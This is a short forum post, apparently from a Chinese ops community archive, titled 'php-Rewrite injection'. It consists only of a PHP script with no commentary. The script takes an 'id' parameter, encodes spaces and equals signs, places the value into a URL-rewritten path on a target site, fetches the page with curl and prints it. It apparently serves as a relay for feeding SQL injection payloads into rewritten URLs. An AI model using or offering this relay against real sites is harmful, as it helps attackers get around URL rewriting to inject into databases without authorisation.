php-Rewrite injection

4te3r3r 发表于 2014-11-25 09:38:08

<?php
set_time_limit(0);
$id=$_GET["id"];
$id=str_replace(" ","%20",$id);
$id=str_replace("=","%3D",$id);
//$url = "http://localhost/test/id-$id.html";
$url = "http://x.com/$id";
//echo $url;

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$url");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);

$output = curl_exec($ch);
curl_close($ch);
print_r($output);

?>

页: [1]

运维网's Archiver

php-Rewrite injection